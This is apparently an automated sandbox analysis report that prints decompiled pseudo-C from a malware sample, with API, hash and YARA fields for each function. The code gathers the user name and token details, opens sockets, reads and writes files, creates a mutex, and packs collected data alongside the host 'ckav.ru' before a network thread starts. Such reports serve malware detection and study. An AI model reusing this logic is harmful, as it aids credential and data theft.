                                      • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                      • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                      • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                      • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                                      0x00402b8c
                                      0x00402b92
                                      0x00402b96
                                      0x00402b9e
                                      0x00402ba3
                                      0x00402baa

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcess
                                      • String ID:
                                      • API String ID: 1357844191-0
                                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                                      0x00406077
                                      0x00406082
                                      0x00406085

                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                      • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                      • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                      • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: recv
                                      • String ID:
                                      • API String ID: 1507349165-0
                                      • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                      • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                      • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                      • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004061C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}


























                                      0x004061c3
                                      0x004061cb
                                      0x004061cd
                                      0x004061d0
                                      0x004061de
                                      0x004061e0
                                      0x004061e5
                                      0x004061e9
                                      0x004061eb
                                      0x004061ed
                                      0x004061f2
                                      0x0040622a
                                      0x00406230
                                      0x00406235
                                      0x00406239
                                      0x0040623b
                                      0x00406244
                                      0x00406249
                                      0x00406249
                                      0x0040624c
                                      0x00406253
                                      0x00406256
                                      0x00406258
                                      0x00406261
                                      0x00406266
                                      0x00406266
                                      0x00406270
                                      0x00406273
                                      0x00406276
                                      0x0040627b
                                      0x0040627e
                                      0x0040628c
                                      0x0040628e
                                      0x00406290
                                      0x00406295
                                      0x0040629a
                                      0x0040629e
                                      0x004062a0
                                      0x004062ac
                                      0x004062af
                                      0x004062b7
                                      0x004062b9
                                      0x004062c9
                                      0x004062e0
                                      0x004062e2
                                      0x004062e4
                                      0x004062f3
                                      0x004062f3
                                      0x004062e4
                                      0x004062f8
                                      0x004062fd
                                      0x004062a0
                                      0x004062fe
                                      0x00406302
                                      0x00406307
                                      0x0040630c
                                      0x0040630d
                                      0x0040630f
                                      0x00406312
                                      0x00406317
                                      0x00406318
                                      0x0040631c
                                      0x0040631e
                                      0x00406321
                                      0x00406326
                                      0x00000000
                                      0x00406327
                                      0x004061f4
                                      0x004061ff
                                      0x00406208
                                      0x00406218
                                      0x0040621d
                                      0x00406224
                                      0x00406226
                                      0x00406228
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406228
                                      0x00406201
                                      0x00000000

                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                      • _wmemset.LIBCMT ref: 00406244
                                      • _wmemset.LIBCMT ref: 00406261
                                      • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: _wmemset$ErrorInformationLastToken
                                      • String ID: IDA$IDA
                                      • API String ID: 487585393-2020647798
                                      • Opcode ID: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                      • Opcode Fuzzy Hash: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                                      0x00404e1d
                                      0x00404e26
                                      0x00404e2a
                                      0x00404e2f
                                      0x00404e37
                                      0x00404e3a
                                      0x00404e45
                                      0x00404e4f
                                      0x00404e57
                                      0x00404e61
                                      0x00404e66
                                      0x00404e68
                                      0x00404e6c
                                      0x00404e6e
                                      0x00404e7a
                                      0x00404e80
                                      0x00404e84
                                      0x00404e9f
                                      0x00404ea7
                                      0x00404eab
                                      0x00404eb1
                                      0x00404eb1
                                      0x00404eb6
                                      0x00404ebe
                                      0x00404ecb
                                      0x00000000
                                      0x00404ec0
                                      0x00404ec1
                                      0x00404ec7
                                      0x00404ec7
                                      0x00404ecd
                                      0x00000000
                                      0x00404ece
                                      0x00404ebe
                                      0x00404e87
                                      0x00404e90
                                      0x00000000
                                      0x00404e90
                                      0x00000000

                                      APIs
                                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                      • socket.WS2_32(?,?,?), ref: 00404E7A
                                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: freeaddrinfogetaddrinfosocket
                                      • String ID:
                                      • API String ID: 2479546573-0
                                      • Opcode ID: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                      • Opcode Fuzzy Hash: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 74%
                                      			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                                      0x004040c4
                                      0x004040ce
                                      0x004040d0
                                      0x004040e8
                                      0x004040ea
                                      0x004040ec
                                      0x004040f2
                                      0x0040418d
                                      0x00404190
                                      0x00404184
                                      0x00000000
                                      0x00404184
                                      0x004041a0
                                      0x004041a5
                                      0x004041a7
                                      0x00000000
                                      0x00000000
                                      0x004041a9
                                      0x004041b6
                                      0x004041b8
                                      0x004041be
                                      0x004041cb
                                      0x004041d0
                                      0x004041d1
                                      0x004041d3
                                      0x004041d8
                                      0x004041dc
                                      0x00000000
                                      0x004041e2
                                      0x00404100
                                      0x0040410c
                                      0x00404111
                                      0x0040417a
                                      0x0040417a
                                      0x00000000
                                      0x0040411b
                                      0x0040411b
                                      0x00404120
                                      0x00404122
                                      0x00404122
                                      0x0040412c
                                      0x0040413a
                                      0x0040413c
                                      0x00404140
                                      0x00000000
                                      0x00404142
                                      0x0040414a
                                      0x00404155
                                      0x0040415a
                                      0x0040415e
                                      0x00404168
                                      0x00404174
                                      0x00404176
                                      0x00404176
                                      0x0040417d
                                      0x0040417e
                                      0x00000000
                                      0x00404183
                                      0x00404140

                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: File$AllocCreateReadVirtual
                                      • String ID: .tmp
                                      • API String ID: 3585551309-2986845003
                                      • Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                                      • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                      • Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                                      • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                                      0x0041386f
                                      0x0041387e
                                      0x00413885
                                      0x00413889
                                      0x0041388c
                                      0x00413890
                                      0x00413893
                                      0x00413897
                                      0x0041389a
                                      0x0041389e
                                      0x004138a1
                                      0x004138a5
                                      0x004138a8
                                      0x004138ac
                                      0x004138af
                                      0x004138b2
                                      0x004138b5
                                      0x004138b8
                                      0x004138bb
                                      0x004138bc
                                      0x004138c4
                                      0x004138c8
                                      0x004138cb
                                      0x004138cf
                                      0x004138d2
                                      0x004138d6
                                      0x004138d7
                                      0x004138df
                                      0x004138e3
                                      0x004138e4
                                      0x004138ea
                                      0x004138eb
                                      0x004138f1
                                      0x004138f5
                                      0x004138f9
                                      0x004138fd
                                      0x00413901
                                      0x00413905
                                      0x00413909
                                      0x0041390d
                                      0x00413911
                                      0x00413915
                                      0x00413919
                                      0x0041391d
                                      0x00413921
                                      0x00413925
                                      0x00413929
                                      0x0041392d
                                      0x00413931
                                      0x00413935
                                      0x00413939
                                      0x0041393d
                                      0x00413941
                                      0x00413950
                                      0x00413959
                                      0x0041395f
                                      0x00413968
                                      0x0041396e
                                      0x00413973
                                      0x00413977
                                      0x00413979
                                      0x00413980
                                      0x00413982
                                      0x00413991
                                      0x0041399c
                                      0x0041399e
                                      0x004139a4
                                      0x004139a9
                                      0x004139ac
                                      0x004139b1
                                      0x004139b1
                                      0x004139b2
                                      0x004139b7
                                      0x004139bc
                                      0x004139c1
                                      0x004139c7
                                      0x004139cd
                                      0x004139cd
                                      0x004139db

                                      APIs
                                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                      • GetLastError.KERNEL32 ref: 0041399E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Error$CreateLastModeMutex
                                      • String ID:
                                      • API String ID: 3448925889-0
                                      • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                      • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                                      0x004042cf
                                      0x004042d5
                                      0x004042df
                                      0x004042e2
                                      0x004042f9
                                      0x004042fb
                                      0x00404300
                                      0x0040430a
                                      0x00404314
                                      0x00404319
                                      0x00404323
                                      0x00404334
                                      0x0040433b
                                      0x0040433b
                                      0x0040433f
                                      0x00404344
                                      0x0040434c

                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                      • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreatePointerWrite
                                      • String ID:
                                      • API String ID: 3672724799-0
                                      • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                      • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                      • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                      • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 34%
                                      			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
